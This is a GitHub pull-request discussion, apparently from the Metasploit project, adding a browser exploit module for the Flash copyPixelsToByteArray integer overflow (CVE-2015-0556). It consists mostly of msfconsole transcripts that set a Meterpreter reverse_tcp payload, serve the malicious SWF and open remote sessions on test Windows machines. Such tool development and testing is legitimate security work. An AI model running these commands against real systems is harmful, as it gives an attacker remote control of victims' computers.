Add module for CVE-2015-0556 (Flash copyPixelsToByteArray int overflow) #5154

jvazquez-r7 · 2015-04-15T19:21:05Z

Full history in the module References. Another flash bug from Zero Day Initiative which was also exploited in the wild.

This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145 and 14.0.0.125.

Verification

Install Windows 7 SP1 (32 bit)
Install IE 8, 9, 10 or 11, whatever you preffer
Install Flash 14 <= 14.0.0.176, whatever you preffer
Run the module like in the demo
VERIFY adobe_flash_copy_pixels_to_byte_array - Exploit requirement(s) not met: flash. For more info: http://r-7.co/PVbcgx message if browser requirements aren't met
VERIFY you get a session if your environment is vulnerable

DEMO

msf > use exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(adobe_flash_copy_pixels_to_byte_array) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://172.16.158.1:8080/qw5Iiad8
[*] Server started.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[!] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Exploit requirement(s) not met: flash. For more info: http://r-7.co/PVbcgx
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/EDsHwx.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131

jvazquez-r7 · 2015-04-15T19:22:09Z

ping @bcook-r7 , this pull request shows the "only sending stage message" behavior:


msf exploit(adobe_flash_copy_pixels_to_byte_array) >
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/Bztuk.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/ECsi.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /qw5Iiad8/WTygDs/lnobV.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131

But the sessions are opening correctly:

msf exploit(adobe_flash_copy_pixels_to_byte_array) > sessions

Active sessions
===============

  Id  Type                   Information                                     Connection
  --  ----                   -----------                                     ----------
  5   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49230 (172.16.158.131)
  6   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49238 (172.16.158.131)
  7   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49245 (172.16.158.131)

msf exploit(adobe_flash_copy_pixels_to_byte_array) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: WIN-RNJ7NBRK9L7\Juan Vazquez
meterpreter > exit -y

bcook-r7 · 2015-04-16T03:48:35Z

What's different between how I ran it and how you did? I think that's probably the key:

msf exploit(adobe_flash_copy_pixels_to_byte_array) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set uripath aaa
uripath => aaa
msf exploit(adobe_flash_copy_pixels_to_byte_array) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.1:4444
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://192.168.56.1:8080/aaa
[*] Server started.
[*] 192.168.56.1     adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 192.168.56.1     adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 192.168.56.1     adobe_flash_copy_pixels_to_byte_array - Request: /aaa/GPUBpG/
[*] 192.168.56.1     adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 192.168.56.1     adobe_flash_copy_pixels_to_byte_array - Request: /aaa/GPUBpG/HVvktQ.swf
[*] 192.168.56.1     adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.1:60668) at 2015-04-15 22:47:00 -0500

jvazquez-r7 · 2015-04-16T03:52:18Z

I don't set uripath but not sure if it it's related, testing.

jvazquez-r7 · 2015-04-16T03:57:54Z

No difference here even after setting uripath:

no uripath:

msf > use exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array         
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set srvhost 172.16.158.1
srvhost => 172.16.158.1
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_copy_pixels_to_byte_array) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(adobe_flash_copy_pixels_to_byte_array) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://172.16.158.1:8080/blPfhg48
[*] Server started.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /blPfhg48/zdYsFk/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /blPfhg48/zdYsFk/fIuMrt.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131

with uripath:

msf exploit(adobe_flash_copy_pixels_to_byte_array) > set uripath aaa
uripath => aaa
msf exploit(adobe_flash_copy_pixels_to_byte_array) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://172.16.158.1:8080/aaa
[*] Server started.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/dNswKu.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131

bcook-r7 · 2015-04-16T03:58:58Z

Maybe its 'run' vs 'rexploit' , or environmental.

bcook-r7 · 2015-04-16T04:02:25Z

That's it! Using 'run' displays the notification, using 'rexploit' does not.

jvazquez-r7 · 2015-04-16T04:05:54Z

I don't see nothing here with run neither :(

msf exploit(adobe_flash_copy_pixels_to_byte_array) > run
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://172.16.158.1:8080/aaa
[*] Server started.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/amHKA.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/Wxrv.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131

msf exploit(adobe_flash_copy_pixels_to_byte_array) >
msf exploit(adobe_flash_copy_pixels_to_byte_array) > jobs -K
Stopping all jobs...

[*] Server stopped.
msf exploit(adobe_flash_copy_pixels_to_byte_array) > run
[*] Exploit running as background job.

[*] Started reverse handler on 172.16.158.1:4444
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] Using URL: http://172.16.158.1:8080/aaa
[*] Server started.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Request: /aaa/eOCbAu/wPfaVx.swf
[*] 172.16.158.131   adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 172.16.158.131

msf exploit(adobe_flash_copy_pixels_to_byte_array) >
msf exploit(adobe_flash_copy_pixels_to_byte_array) > sessions

Active sessions
===============

  Id  Type                   Information                                     Connection
  --  ----                   -----------                                     ----------
  1   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49299 (172.16.158.131)
  2   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49337 (172.16.158.131)
  3   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49356 (172.16.158.131)
  4   meterpreter x86/win32  WIN-RNJ7NBRK9L7\Juan Vazquez @ WIN-RNJ7NBRK9L7  172.16.158.1:4444 -> 172.16.158.131:49360 (172.16.158.131)

wchen-r7 · 2015-04-16T23:15:29Z

@bcook-r7 So sounds like you're reproducing the issue, right? Can I go ahead and start testing this module and then land it? Or would you like me to hold for longer? Thx!

wchen-r7 · 2015-04-17T01:28:47Z

This module works for me:

msf > use exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array
msf exploit(adobe_flash_copy_pixels_to_byte_array) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.64:4444 
[*] Using URL: http://0.0.0.0:8080/hjQbZjTbUJPW
[*] Local IP: http://192.168.1.64:8080/hjQbZjTbUJPW
[*] Server started.
msf exploit(adobe_flash_copy_pixels_to_byte_array) > [*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Gathering target information.
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Sending HTML response.
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Request: /hjQbZjTbUJPW/NYKHBg/
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Sending HTML...
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Request: /hjQbZjTbUJPW/NYKHBg/ppPUfu.swf
[*] 192.168.1.168    adobe_flash_copy_pixels_to_byte_array - Sending SWF...
[*] Sending stage (881664 bytes) to 192.168.1.168
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.168:50913) at 2015-04-16 20:28:19 -0500

bcook-r7 · 2015-04-17T01:47:03Z

I reproduced with rexploit - I don't think that should be a blocker for this module :)

wchen-r7 · 2015-04-17T01:48:43Z

OK sounds good. Thanks!

sage aborts

rajchandel · 2015-04-20T09:56:34Z

can you provide me adobe flash 14.0.0.176 download link

bcook-r7 · 2015-04-20T13:23:44Z

Here you go:

https://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html

Add module for CVE-2015-0556

28fac60

jvazquez-r7 assigned wchen-r7 Apr 15, 2015

wchen-r7 added module feature labels Apr 16, 2015

bcook-r7 mentioned this pull request Apr 17, 2015

sometimes when a session is opened, the session notification does not appear in the console #5177

Closed

wchen-r7 merged commit 28fac60 into rapid7:master Apr 17, 2015

wchen-r7 added a commit that referenced this pull request Apr 17, 2015

Land #5154, CVE-2015-0556 (Flash copyPixelsToByteArray int overflow)

3927024

sage aborts

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Add module for CVE-2015-0556 (Flash copyPixelsToByteArray int overflow) #5154

Add module for CVE-2015-0556 (Flash copyPixelsToByteArray int overflow) #5154

jvazquez-r7 commented Apr 15, 2015

jvazquez-r7 commented Apr 15, 2015

bcook-r7 commented Apr 16, 2015

jvazquez-r7 commented Apr 16, 2015

jvazquez-r7 commented Apr 16, 2015

bcook-r7 commented Apr 16, 2015

bcook-r7 commented Apr 16, 2015

jvazquez-r7 commented Apr 16, 2015

wchen-r7 commented Apr 16, 2015

wchen-r7 commented Apr 17, 2015

bcook-r7 commented Apr 17, 2015

wchen-r7 commented Apr 17, 2015

rajchandel commented Apr 20, 2015

bcook-r7 commented Apr 20, 2015

Add module for CVE-2015-0556 (Flash copyPixelsToByteArray int overflow) #5154

Add module for CVE-2015-0556 (Flash copyPixelsToByteArray int overflow) #5154

Conversation

jvazquez-r7 commented Apr 15, 2015

Verification

DEMO

jvazquez-r7 commented Apr 15, 2015

bcook-r7 commented Apr 16, 2015

jvazquez-r7 commented Apr 16, 2015

jvazquez-r7 commented Apr 16, 2015

bcook-r7 commented Apr 16, 2015

bcook-r7 commented Apr 16, 2015

jvazquez-r7 commented Apr 16, 2015

wchen-r7 commented Apr 16, 2015

wchen-r7 commented Apr 17, 2015

bcook-r7 commented Apr 17, 2015

wchen-r7 commented Apr 17, 2015

rajchandel commented Apr 20, 2015

bcook-r7 commented Apr 20, 2015